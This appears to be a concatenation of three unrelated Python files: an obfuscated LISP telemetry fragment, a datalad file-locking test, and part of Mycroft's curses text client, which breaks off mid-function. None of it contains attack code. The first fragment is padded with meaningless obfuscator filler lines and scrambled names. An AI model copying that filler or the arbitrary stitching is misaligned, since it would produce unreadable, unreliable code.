if 68 - 68: OoooooooOO + i1IIi % I1ii11iIi11i . iII111i
if 69 - 69: ooOoO0o * II111iiii + i11iIiiIii / oO0o + I1Ii111 - OOooOOo
if 84 - 84: O0
if 29 - 29: I11i + o0oOOo0O0Ooo . ooOoO0o * I1Ii111 - o0oOOo0O0Ooo * O0
if 58 - 58: iII111i . oO0o + i11iIiiIii
if 2 - 2: OOooOOo * Ii1I
if 17 - 17: I1ii11iIi11i * O0 / OoOoOO00 + i1IIi
if 71 - 71: oO0o % IiII
if 77 - 77: i1IIi * o0oOOo0O0Ooo - Oo0Ooo / I1Ii111 - Ii1I * IiII
if 51 - 51: OoO0O00 * IiII
if 36 - 36: II111iiii + I11i - O0
if 24 - 24: I1Ii111 / OoOoOO00
def lisp_encode_telemetry ( json_string , ii = "?" , io = "?" , ei = "?" , eo = "?" ) :
o0o0OO = lisp_is_json_telemetry ( json_string )
if ( o0o0OO == None ) : return ( json_string )
if 10 - 10: I11i . OoO0O00 / O0 / oO0o / o0oOOo0O0Ooo / ooOoO0o
if ( o0o0OO [ "itr-in" ] == "?" ) : o0o0OO [ "itr-in" ] = ii
if ( o0o0OO [ "itr-out" ] == "?" ) : o0o0OO [ "itr-out" ] = io
if ( o0o0OO [ "etr-in" ] == "?" ) : o0o0OO [ "etr-in" ] = ei
if ( o0o0OO [ "etr-out" ] == "?" ) : o0o0OO [ "etr-out" ] = eo
json_string = json . dumps ( o0o0OO )
return ( json_string )
if 30 - 30: Oo0Ooo
if 93 - 93: II111iiii - I1IiiI
if 80 - 80: I11i . o0oOOo0O0Ooo % IiII - OoOoOO00 % OOooOOo / OoooooooOO
if 57 - 57: OoooooooOO % o0oOOo0O0Ooo - iIii1I11I1II1 . OoooooooOO
if 42 - 42: o0oOOo0O0Ooo % OoooooooOO * OoO0O00 - o0oOOo0O0Ooo
if 83 - 83: i1IIi . i1IIi * ooOoO0o
if 26 - 26: I1IiiI - IiII
if 99 - 99: IiII * iII111i + i1IIi * I1Ii111
if 88 - 88: o0oOOo0O0Ooo . IiII - Oo0Ooo
if 24 - 24: Oo0Ooo - OOooOOo / Ii1I / II111iiii . Oo0Ooo - Ii1I
if 5 - 5: IiII
if 66 - 66: OoO0O00 . I1ii11iIi11i . OoooooooOO
def lisp_decode_telemetry ( json_string ) :
o0o0OO = lisp_is_json_telemetry ( json_string )
if ( o0o0OO == None ) : return ( { } )
return ( o0o0OO )
if 21 - 21: I11i / IiII + i1IIi . Oo0Ooo % II111iiii
if 8 - 8: oO0o / iIii1I11I1II1 + OoooooooOO
if 11 - 11: OOooOOo . O0 + IiII . i1IIi
if 81 - 81: OoO0O00 - I11i - OoO0O00 + oO0o
if 20 - 20: OoooooooOO - Oo0Ooo + I1Ii111 + OoooooooOO
if 66 - 66: I1ii11iIi11i / oO0o % IiII + II111iiii % iII111i
if 54 - 54: iII111i * O0 / I1IiiI % Ii1I
if 12 - 12: IiII % I1IiiI - o0oOOo0O0Ooo - I1ii11iIi11i - i11iIiiIii * i1IIi
if 96 - 96: II111iiii % o0oOOo0O0Ooo % oO0o * ooOoO0o
def lisp_telemetry_configured ( ) :
if ( "telemetry" not in lisp_json_list ) : return ( None )
if 79 - 79: iII111i
Ii111I1iIiiIi = lisp_json_list [ "telemetry" ] . json_string
if ( lisp_is_json_telemetry ( Ii111I1iIiiIi ) == None ) : return ( None )
if 74 - 74: Oo0Ooo - IiII - iII111i - IiII / IiII
return ( Ii111I1iIiiIi )
if 75 - 75: I11i - i11iIiiIii % O0 - O0 % O0
if 93 - 93: ooOoO0o + iIii1I11I1II1
if 27 - 27: i1IIi * i11iIiiIii - OoOoOO00 * Ii1I . IiII + iII111i
if 25 - 25: I1ii11iIi11i % o0oOOo0O0Ooo - OoO0O00
if 28 - 28: oO0o
if 8 - 8: I11i / OoooooooOO % OoooooooOO . Oo0Ooo
if 30 - 30: iII111i
def lisp_mr_or_pubsub ( action ) :
return ( action in [ LISP_SEND_MAP_REQUEST_ACTION , LISP_SEND_PUBSUB_ACTION ] )
if 25 - 25: I11i % i1IIi + OOooOOo * Ii1I . i1IIi
if 81 - 81: I11i % OoOoOO00 . Ii1I
if 82 - 82: i1IIi / II111iiii
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
test_locking.py
|
#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
#ex: set sts=4 ts=4 sw=4 noet:
"""
LICENSE: MIT
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import os.path as op
from ..locking import lock_if_check_fails
from datalad.tests.utils import ok_exists, with_tempfile, ok_, eq_
@with_tempfile
def test_lock_if_check_fails(tempfile):
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(True, None) as (check, lock):
assert check is True
assert lock is None
assert check # still available outside
# and with a callable
with lock_if_check_fails(lambda: "valuable", None) as (check, lock):
eq_(check, "valuable")
assert lock is None
eq_(check, "valuable")
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(False, tempfile) as (check, lock):
ok_(lock.acquired)
ok_exists(tempfile + '.lck')
assert not op.exists(tempfile + '.lck') # and it gets removed after
# the same with providing operation
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(False, tempfile, operation='get') as (check, lock):
ok_(lock.acquired)
ok_exists(tempfile + '.get-lck')
assert not op.exists(tempfile + '.get-lck') # and it gets removed after
def subproc(q):
with lock_if_check_fails(False, tempfile, blocking=False) as (_, lock2):
q.put(lock2.acquired)
from multiprocessing import Queue, Process
q = Queue()
p = Process(target=subproc, args=(q,))
# now we need somehow to actually check the bloody lock functioning
with lock_if_check_fails((op.exists, (tempfile,)), tempfile) as (check, lock):
eq_(check, False)
ok_(lock.acquired)
# but now we will try to lock again, but we need to do it in another
# process
p.start()
assert q.get() is False
p.join()
with open(tempfile, 'w') as f:
pass
ok_exists(tempfile)
ok_exists(tempfile)
# and we redo -- it will acquire it
p = Process(target=subproc, args=(q,))
p.start()
ok_(q.get())
p.join()
|
text_client.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import io
from math import ceil
import xdg.BaseDirectory
from mycroft.client.text.gui_server import start_qml_gui
from mycroft.tts import TTS
import os
import os.path
import time
import curses
import textwrap
import json
import mycroft.version
from threading import Thread, Lock
from mycroft.messagebus.client import MessageBusClient
from mycroft.messagebus.message import Message
from mycroft.util.log import LOG
from mycroft.configuration import Configuration, BASE_FOLDER
from mycroft.configuration.holmes import is_using_xdg
import locale
# Curses uses LC_ALL to determine how to display chars set it to system
# default
locale.setlocale(locale.LC_ALL, "") # Set LC_ALL to user default
preferred_encoding = locale.getpreferredencoding()
bSimple = False
bus = None # Mycroft messagebus connection
config = {} # Will be populated by the Mycroft configuration
event_thread = None
history = []
chat = [] # chat history, oldest at the lowest index
line = ""
scr = None
log_line_offset = 0 # num lines back in logs to show
log_line_lr_scroll = 0 # amount to scroll left/right for long lines
longest_visible_line = 0 # for HOME key
auto_scroll = True
# for debugging odd terminals
last_key = ""
show_last_key = False
show_gui = None # None = not initialized, else True/False
gui_text = []
log_lock = Lock()
max_log_lines = 5000
mergedLog = []
filteredLog = []
default_log_filters = ["mouth.viseme", "mouth.display", "mouth.icon"]
log_filters = list(default_log_filters)
log_files = []
find_str = None
cy_chat_area = 7 # default chat history height (in lines)
size_log_area = 0 # max number of visible log lines, calculated during draw
# Values used to display the audio meter
show_meter = True
meter_peak = 20
meter_cur = -1
meter_thresh = -1
SCR_MAIN = 0
SCR_HELP = 1
SCR_SKILLS = 2
screen_mode = SCR_MAIN
subscreen = 0 # for help pages, etc.
REDRAW_FREQUENCY = 10 # seconds between full redraws
last_redraw = time.time() - (REDRAW_FREQUENCY - 1) # seed for 1s redraw
screen_lock = Lock()
is_screen_dirty = True
# Curses color codes (reassigned at runtime)
CLR_HEADING = 0
CLR_FIND = 0
CLR_CHAT_RESP = 0
CLR_CHAT_QUERY = 0
CLR_CMDLINE = 0
CLR_INPUT = 0
CLR_LOG1 = 0
CLR_LOG2 = 0
CLR_LOG_DEBUG = 0
CLR_LOG_ERROR = 0
CLR_LOG_CMDMESSAGE = 0
CLR_METER_CUR = 0
CLR_METER = 0
# Allow Ctrl+C catching...
ctrl_c_was_pressed = False
def ctrl_c_handler(signum, frame):
global ctrl_c_was_pressed
ctrl_c_was_pressed = True
def ctrl_c_pressed():
global ctrl_c_was_pressed
if ctrl_c_was_pressed:
ctrl_c_was_pressed = False
return True
else:
return False
##############################################################################
# Helper functions
def clamp(n, smallest, largest):
""" Force n to be between smallest and largest, inclusive """
return max(smallest, min(n, largest))
def handleNonAscii(text):
"""
If default locale supports UTF-8 reencode the string otherwise
remove the offending characters.
"""
if preferred_encoding == 'ASCII':
return ''.join([i if ord(i) < 128 else ' ' for i in text])
else:
return text.encode(preferred_encoding)
##############################################################################
# Settings
filename = "mycroft_cli.conf"
def load_mycroft_config(bus):
""" Load the mycroft config and connect it to updates over the messagebus.
"""
Configuration.set_config_update_handlers(bus)
return Configuration.get()
def connect_to_mycroft():
""" Connect to the mycroft messagebus and load and register config
on the bus.
Sets the bus and config global variables
"""
global bus
global config
bus = connect_to_messagebus()
config = load_mycroft_config(bus)
def load_settings():
global log_filters
global cy_chat_area
global show_last_key
global max_log_lines
global show_meter
config_file = None
# Old location
path = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf")
if not is_using_xdg():
config_file = path
elif os.path.isfile(path):
from mycroft.configuration.config import _log_old_location_deprecation
_log_old_location_deprecation(path)
config_file = path
# Check XDG_CONFIG_DIR
if config_file is None:
for conf_dir in xdg.BaseDirectory.load_config_paths(BASE_FOLDER):
xdg_file = os.path.join(conf_dir, filename)
if os.path.isfile(xdg_file):
config_file = xdg_file
break
# Check /etc/mycroft
if config_file is None:
config_file = os.path.join("/etc/mycroft", filename)
try:
with io.open(config_file, 'r') as f:
config = json.load(f)
if "filters" in config:
# Disregard the filtering of DEBUG messages
log_filters = [f for f in config["filters"] if f != "DEBUG"]
if "cy_chat_area" in config:
cy_chat_area = config["cy_chat_area"]
if "show_last_key" in config:
show_last_key = config["show_last_key"]
if "max_log_lines" in config:
max_log_lines = config["max_log_lines"]
if "show_meter" in config:
show_meter = config["show_meter"]
except Exception as e:
LOG.info("Ignoring failed load of settings file")
def save_settings():
config = {}
config["filters"] = log_filters
config["cy_chat_area"] = cy_chat_area
config["show_last_key"] = show_last_key
config["max_log_lines"] = max_log_lines
config["show_meter"] = show_meter
# Old location
path = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf")
if not is_using_xdg():
config_file = path
else:
config_file = os.path.join(xdg.BaseDirectory.xdg_config_home,
BASE_FOLDER, filename)
with io.open(config_file, 'w') as f:
f.write(str(json.dumps(config, ensure_ascii=False)))
##############################################################################
# Log file monitoring
class LogMonitorThread(Thread):
def __init__(self, filename, logid):
global log_files
Thread.__init__(self)
self.filename = filename
self.st_results = os.stat(filename)
self.logid = str(logid)
log_files.append(filename)
def run(self):
while True:
try:
st_results = os.stat(self.filename)
# Check if file has been modified since last read
if not st_results.st_mtime == self.st_results.st_mtime:
self.read_file_from(self.st_results.st_size)
self.st_results = st_results
set_screen_dirty()
except OSError:
# ignore any file IO exceptions, just try again
pass
time.sleep(0.1)
def read_file_from(self, bytefrom):
global meter_cur
global meter_thresh
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with io.open(self.filename) as fh:
fh.seek(bytefrom)
while True:
line = fh.readline()
if line == "":
break
# Allow user to filter log output
ignore = False
if find_str:
if find_str not in line:
ignore = True
else:
for filtered_text in log_filters:
if filtered_text in line:
ignore = True
break
with log_lock:
if ignore:
mergedLog.append(self.logid + line.rstrip())
else:
if bSimple:
print(line.rstrip())
else:
filteredLog.append(self.logid + line.rstrip())
mergedLog.append(self.logid + line.rstrip())
if not auto_scroll:
log_line_offset += 1
# Limit log to max_log_lines
if len(mergedLog) >= max_log_lines:
with log_lock:
cToDel = len(mergedLog) - max_log_lines
if len(filteredLog) == len(mergedLog):
del filteredLog[:cToDel]
del mergedLog[:cToDel]
# release log_lock before calling to prevent deadlock
if len(filteredLog) != len(mergedLog):
rebuild_filtered_log()
def start_log_monitor(filename):
if os.path.isfile(filename):
thread = LogMonitorThread(filename, len(log_files))
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
class MicMonitorThread(Thread):
def __init__(self, filename):
Thread.__init__(self)
self.filename = filename
self.st_results = None
def run(self):
while True:
try:
st_results = os.stat(self.filename)
if (not self.st_results or
not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
self.read_mic_level()
self.st_results = st_results
set_screen_dirty()
except Exception:
# Ignore whatever failure happened and just try again later
pass
time.sleep(0.2)
def read_mic_level(self):
global meter_cur
global meter_thresh
with io.open(self.filename, 'r') as fh:
line = fh.readline()
# Just adjust meter settings
# Ex:Energy: cur=4 thresh=1.5 muted=0
cur_text, thresh_text, _ = line.split(' ')[-3:]
meter_thresh = float(thresh_text.split('=')[-1])
meter_cur = float(cur_text.split('=')[-1])
class ScreenDrawThread(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
global scr
global screen_lock
global is_screen_dirty
global log_lock
while scr:
try:
if is_screen_dirty:
# Use a lock to prevent screen corruption when drawing
# from multiple threads
with screen_lock:
is_screen_dirty = False
if screen_mode == SCR_MAIN:
with log_lock:
do_draw_main(scr)
elif screen_mode == SCR_HELP:
do_draw_help(scr)
finally:
time.sleep(0.01)
def start_mic_monitor(filename):
if os.path.isfile(filename):
thread = MicMonitorThread(filename)
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
def add_log_message(message):
""" Show a message for the user (mixed in the logs) """
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
message = "@" + message # the first byte is a code
filteredLog.append(message)
mergedLog.append(message)
if log_line_offset != 0:
log_line_offset = 0 # scroll so the user can see the message
set_screen_dirty()
def clear_log():
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
mergedLog = []
filteredLog = []
log_line_offset = 0
def rebuild_filtered_log():
global filteredLog
global mergedLog
global log_lock
with log_lock:
filteredLog = []
for line in mergedLog:
# Apply filters
ignore = False
if find_str and find_str != "":
# Searching log
if find_str not in line:
ignore = True
else:
# Apply filters
for filtered_text in log_filters:
if filtered_text and filtered_text in line:
ignore = True
break
if not ignore:
filteredLog.append(line)
##############################################################################
# Capturing output from Mycroft
def handle_speak(event):
global chat
utterance = event.data.get('utterance')
utterance = TTS.remove_ssml(utterance)
if bSimple:
print(">> " + utterance)
else:
chat.append(">> " + utterance)
set_screen_dirty()
def handle_utterance(event):
global chat
global history
utterance = event.data.get('utterances')[0]
history.append(utterance)
chat.append(utterance)
set_screen_dirty()
def connect(bus):
""" Run the mycroft messagebus referenced by bus.
Args:
bus: Mycroft messagebus instance
"""
bus.run_forever()
##############################################################################
# Capturing the messagebus
def handle_message(msg):
# TODO: Think this thru a little bit -- remove this logging within core?
# add_log_message(msg)
pass
##############################################################################
# "Graphic primitives"
def draw(x, y, msg, pad=None, pad_chr=None, clr=None):
"""Draw a text to the screen
Args:
x (int): X coordinate (col), 0-based from upper-left
y (int): Y coordinate (row), 0-based from upper-left
msg (str): string to render to screen
pad (bool or int, optional): if int, pads/clips to given length, if
True use right edge of the screen.
pad_chr (char, optional): pad character, default is space
clr (int, optional): curses color, Defaults to CLR_LOG1.
"""
if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS:
return
if x + len(msg) > curses.COLS:
s = msg[:curses.COLS - x]
else:
s = msg
if pad:
ch = pad_chr or " "
if pad is True:
pad = curses.COLS # pad to edge of screen
s += ch * (pad - x - len(msg))
else:
# pad to given length (or screen width)
if x + pad > curses.COLS:
pad = curses.COLS - x
s += ch * (pad - len(msg))
if not clr:
clr = CLR_LOG1
scr.addstr(y, x, s, clr)
##############################################################################
# Screen handling
def init_screen():
global CLR_HEADING
global CLR_FIND
global CLR_CHAT_RESP
global CLR_CHAT_QUERY
global CLR_CMDLINE
global CLR_INPUT
global CLR_LOG1
global CLR_LOG2
global CLR_LOG_DEBUG
global CLR_LOG_ERROR
global CLR_LOG_CMDMESSAGE
global CLR_METER_CUR
global CLR_METER
if curses.has_colors():
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
bg = curses.COLOR_BLACK
for i in range(1, curses.COLORS):
curses.init_pair(i + 1, i, bg)
# Colors (on black backgound):
# 1 = white 5 = dk blue
# 2 = dk red 6 = dk purple
# 3 = dk green 7 = dk cyan
# 4 = dk yellow 8 = lt gray
CLR_HEADING = curses.color_pair(1)
CLR_CHAT_RESP = curses.color_pair(4)
CLR_CHAT_QUERY = curses.color_pair(7)
CLR_FIND = curses.color_pair(4)
CLR_CMDLINE = curses.color_pair(7)
CLR_INPUT = curses.color_pair(7)
CLR_LOG1 = curses.color_pair(3)
CLR_LOG2 = curses.color_pair(6)
CLR_LOG_DEBUG = curses.color_pair(4)
CLR_LOG_ERROR = curses.color_pair(2)
CLR_LOG_CMDMESSAGE = curses.color_pair(2)
CLR_METER_CUR = curses.color_pair(2)
CLR_METER = curses.color_pair(4)
def scroll_log(up, num_lines=None):
global log_line_offset
# default to a half-page
if not num_lines:
num_lines = size_log_area // 2
with log_lock:
if up:
log_line_offset -= num_lines
else:
log_line_offset += num_lines
if log_line_offset > len(filteredLog):
log_line_offset = len(filteredLog) - 10
if log_line_offset < 0:
log_line_offset = 0
set_screen_dirty()
def _do_meter(height):
if not show_meter or meter_cur == -1:
return
# The meter will look something like this:
#
# 8.4 *
# *
# -*- 2.4
# *
# *
# *
# Where the left side is the current level and the right side is
# the threshold level for 'silence'.
global scr
global meter_peak
if meter_cur > meter_peak:
meter_peak = meter_cur + 1
scale = meter_peak
if meter_peak > meter_thresh * 3:
scale = meter_thresh * 3
h_cur = clamp(int((float(meter_cur) / scale) * height), 0, height - 1)
h_thresh = clamp(
int((float(meter_thresh) / scale) * height), 0, height - 1)
clr = curses.color_pair(4) # dark yellow
str_level = "{0:3} ".format(int(meter_cur)) # e.g. ' 4'
str_thresh = "{0:4.2f}".format(meter_thresh) # e.g. '3.24'
meter_width = len(str_level) + len(str_thresh) + 4
for i in range(0, height):
meter = ""
if i == h_cur:
# current energy level
meter = str_level
else:
meter = " " * len(str_level)
if i == h_thresh:
# add threshold indicator
meter += "--- "
else:
meter += " "
if i == h_thresh:
# 'silence' threshold energy level
meter += str_thresh
# draw the line
meter += " " * (meter_width - len(meter))
scr.addstr(curses.LINES - 1 - i, curses.COLS -
len(meter) - 1, meter, clr)
# draw an asterisk if the audio energy is at this level
if i <= h_cur:
if meter_cur > meter_thresh:
clr_bar = curses.color_pair(3) # dark green for loud
else:
clr_bar = curses.color_pair(5) # dark blue for 'silent'
scr.addstr(curses.LINES - 1 - i, curses.COLS - len(str_thresh) - 4,
"*", clr_bar)
def _do_gui(gui_width):
clr = curses.color_pair(2) # dark red
x = curses.COLS - gui_width
y = 3
draw(
x,
y,
" " +
make_titlebar(
"= GUI",
gui_width -
1) +
" ",
clr=CLR_HEADING)
cnt = len(gui_text) + 1
if cnt > curses.LINES - 15:
cnt = curses.LINES - 15
for i in range(0, cnt):
draw(x, y + 1 + i, " !", clr=CLR_HEADING)
if i < len(gui_text):
draw(x + 2, y + 1 + i, gui_text[i], pad=gui_width - 3)
else:
draw(x + 2, y + 1 + i, "*" * (gui_width - 3))
draw(x + (gui_width - 1), y + 1 + i, "!", clr=CLR_HEADING)
draw(x, y + cnt, " " + "-" * (gui_width - 2) + " ", clr=CLR_HEADING)
def set_screen_dirty():
global is_screen_dirty
global screen_lock
with screen_lock:
is_screen_dirty = True
def do_draw_main(scr):
global log_line_offset
global longest_visible_line
global last_redraw
global auto_scroll
global size_log_area
if time.time() - last_redraw > REDRAW_FREQUENCY:
# Do a full-screen redraw periodically to clear and
# noise from non-curses text that get output to the
# screen (e.g. modules that do a 'print')
scr.clear()
last_redraw = time.time()
else:
scr.erase()
# Display log output at the top
cLogs = len(filteredLog) + 1 # +1 for the '--end--'
size_log_area = curses.LINES - (cy_chat_area + 5)
start = clamp(cLogs - size_log_area, 0, cLogs - 1) - log_line_offset
end = cLogs - log_line_offset
if start < 0:
end -= start
start = 0
if end > cLogs:
end = cLogs
auto_scroll = (end == cLogs)
# adjust the line offset (prevents paging up too far)
log_line_offset = cLogs - end
# Top header and line counts
if find_str:
scr.addstr(0, 0, "Search Results: ", CLR_HEADING)
scr.addstr(0, 16, find_str, CLR_FIND)
scr.addstr(0, 16 + len(find_str), " ctrl+X to end" +
" " * (curses.COLS - 31 - 12 - len(find_str)) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
else:
scr.addstr(0, 0, "Log Output:" + " " * (curses.COLS - 31) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
ver = " mycroft-core " + mycroft.version.CORE_VERSION_STR + " ==="
scr.addstr(1, 0, "=" * (curses.COLS - 1 - len(ver)), CLR_HEADING)
scr.addstr(1, curses.COLS - 1 - len(ver), ver, CLR_HEADING)
y = 2
for i in range(start, end):
if i >= cLogs - 1:
log = ' ^--- NEWEST ---^ '
else:
log = filteredLog[i]
logid = log[0]
if len(log) > 25 and log[5] == '-' and log[8] == '-':
log = log[11:] # skip logid & date at the front of log line
else:
log = log[1:] # just skip the logid
# Categorize log line
if "| DEBUG |" in log:
log = log.replace("Skills ", "")
clr = CLR_LOG_DEBUG
elif "| ERROR |" in log:
clr = CLR_LOG_ERROR
else:
if logid == "1":
clr = CLR_LOG1
elif logid == "@":
clr = CLR_LOG_CMDMESSAGE
else:
clr = CLR_LOG2
# limit output line to screen width
len_line = len(log)
if len(log) > curses.COLS:
start = len_line - (curses.COLS - 4) - log_line_lr_scroll
if start < 0:
start = 0
end = start + (curses.COLS - 4)
if start == 0:
log = log[start:end] + "~~~~" # start....
elif end >= len_line - 1:
log = "~~~~" + log[start:end] # ....end
else:
log = "~~" + log[start:end] + "~~" # ..middle..
if len_line > longest_visible_line:
longest_visible_line = len_line
scr.addstr(y, 0, handleNonAscii(log), clr)
y += 1
# Log legend in the lower-right
y_log_legend = curses.LINES - (3 + cy_chat_area)
scr.addstr(y_log_legend, curses.COLS // 2 + 2,
make_titlebar("Log Output Legend", curses.COLS // 2 - 2),
CLR_HEADING)
scr.addstr(y_log_legend + 1, curses.COLS // 2 + 2,
"DEBUG output",
CLR_LOG_DEBUG)
if len(log_files) > 0:
scr.addstr(y_log_legend + 2, curses.COLS // 2 + 2,
os.path.basename(log_files[0]) + ", other",
CLR_LOG2)
if len(log_files) > 1:
scr.addstr(y_log_legend + 3, curses.COLS // 2 + 2,
os.path.basename(log_files[1]), CLR_LOG1)
# Meter
y_meter = y_log_legend
if show_meter:
scr.addstr(y_meter, curses.COLS - 14, " Mic Level ",
CLR_HEADING)
# History log in the middle
y_chat_history = curses.LINES - (3 + cy_chat_area)
chat_width = curses.COLS // 2 - 2
chat_out = []
scr.addstr(y_chat_history, 0, make_titlebar("History", chat_width),
CLR_HEADING)
# Build a nicely wrapped version of the chat log
idx_chat = len(chat) - 1
while len(chat_out) < cy_chat_area and idx_chat >= 0:
if chat[idx_chat][0] == '>':
wrapper = textwrap.TextWrapper(initial_indent="",
subsequent_indent=" ",
width=chat_width)
else:
wrapper = textwrap.TextWrapper(width=chat_width)
chatlines = wrapper.wrap(chat[idx_chat])
for txt in reversed(chatlines):
if len(chat_out) >= cy_chat_area:
break
chat_out.insert(0, txt)
idx_chat -= 1
# Output the chat
y = curses.LINES - (2 + cy_chat_area)
for txt in chat_out:
if txt.startswith(">> ") or txt.startswith(" "):
clr = CLR_CHAT_RESP
else:
clr = CLR_CHAT_QUERY
scr.addstr(y, 1, handleNonAscii(txt), clr)
y += 1
if show_gui and curses.COLS > 20 and curses.LINES > 20:
_do_gui(curses.COLS - 20)
# Command line at the bottom
ln = line
if len(line) > 0 and line[0] == ":":
scr.addstr(curses.LINES - 2, 0, "Command ('help' for options):",
CLR_CMDLINE)
scr.addstr(curses.LINES - 1, 0, ":", CLR_CMDLINE)
ln = line[1:]
else:
prompt = "Input (':' for command, Ctrl+C to quit)"
if show_last_key:
prompt += " === keycode: " + last_key
scr.addstr(curses.LINES - 2, 0,
make_titlebar(prompt,
curses.COLS - 1),
CLR_HEADING)
scr.addstr(curses.LINES - 1, 0, ">", CLR_HEADING)
_do_meter(cy_chat_area + 2)
scr.addstr(curses.LINES - 1, 2, ln[-(curses.COLS - 3):], CLR_INPUT)
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def make_titlebar(title, bar_length):
return title + " " + ("=" * (bar_length - 1 - len(title)))
##############################################################################
# Help system
help_struct = [('Log Scrolling shortcuts',
[("Up / Down / PgUp / PgDn",
"scroll thru history"),
("Ctrl+T / Ctrl+PgUp",
"scroll to top of logs (jump to oldest)"),
("Ctrl+B / Ctrl+PgDn",
"scroll to bottom of logs" + "(jump to newest)"),
("Left / Right",
"scroll long lines left/right"),
("Home / End",
"scroll to start/end of long lines")]),
("Query History shortcuts",
[("Ctrl+N / Ctrl+Left",
"previous query"),
("Ctrl+P / Ctrl+Right",
"next query")]),
("General Commands (type ':' to enter command mode)",
[(":quit or :exit",
"exit the program"),
(":meter (show|hide)",
"display the microphone level"),
(":keycode (show|hide)",
"display typed key codes (mainly debugging)"),
(":history (# lines)",
"set size of visible history buffer"),
(":clear",
"flush the logs")]),
("Log Manipulation Commands",
[(":filter 'STR'",
"adds a log filter (optional quotes)"),
(":filter remove 'STR'",
"removes a log filter"),
(":filter (clear|reset)",
"reset filters"),
(":filter (show|list)",
"display current filters"),
(":find 'STR'",
"show logs containing 'str'"),
(":log level (DEBUG|INFO|ERROR)",
"set logging level"),
(":log bus (on|off)",
"control logging of messagebus messages")]),
("Skill Debugging Commands",
[(":skills",
"list installed Skills"),
(":api SKILL",
"show Skill's public API"),
(":activate SKILL",
"activate Skill, e.g. 'activate skill-wiki'"),
(":deactivate SKILL",
"deactivate Skill"),
(":keep SKILL",
"deactivate all Skills except the indicated Skill")])]
help_longest = 0
for s in help_struct:
for ent in s[1]:
help_longest = max(help_longest, len(ent[0]))
HEADER_SIZE = 2
HEADER_FOOTER_SIZE = 4
def num_help_pages():
lines = 0
for section in help_struct:
lines += 3 + len(section[1])
return ceil(lines / (curses.LINES - HEADER_FOOTER_SIZE))
def do_draw_help(scr):
def render_header():
scr.addstr(0, 0, center(25) + "Mycroft Command Line Help", CLR_HEADING)
scr.addstr(1, 0, "=" * (curses.COLS - 1), CLR_HEADING)
def render_help(txt, y_pos, i, first_line, last_line, clr):
if i >= first_line and i < last_line:
scr.addstr(y_pos, 0, txt, clr)
y_pos += 1
return y_pos
def render_footer(page, total):
text = "Page {} of {} [ Any key to continue ]".format(page, total)
scr.addstr(curses.LINES - 1, 0, center(len(text)) + text, CLR_HEADING)
scr.erase()
render_header()
y = HEADER_SIZE
page = subscreen + 1
# Find first and last taking into account the header and footer
first = subscreen * (curses.LINES - HEADER_FOOTER_SIZE)
last = first + (curses.LINES - HEADER_FOOTER_SIZE)
i = 0
for section in help_struct:
y = render_help(section[0], y, i, first, last, CLR_HEADING)
i += 1
y = render_help("=" * (curses.COLS - 1), y, i, first, last,
CLR_HEADING)
i += 1
for line in section[1]:
words = line[1].split()
ln = line[0].ljust(help_longest + 1)
for w in words:
if len(ln) + 1 + len(w) < curses.COLS:
ln += " " + w
else:
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
ln = " ".ljust(help_longest + 2) + w
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
i += 1
y = render_help(" ", y, i, first, last, CLR_CMDLINE)
i += 1
if i > last:
break
render_footer(page, num_help_pages())
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def show_help():
global screen_mode
global subscreen
if screen_mode != SCR_HELP:
screen_mode = SCR_HELP
subscreen = 0
set_screen_dirty()
def show_next_help():
global screen_mode
global subscreen
if screen_mode == SCR_HELP:
subscreen += 1
if subscreen >= num_help_pages():
screen_mode = SCR_MAIN
set_screen_dirty()
##############################################################################
# Skill debugging
def show_skills(skills):
"""Show list of loaded Skills in as many column as necessary."""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Loaded Skills", CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 0
prepare_page()
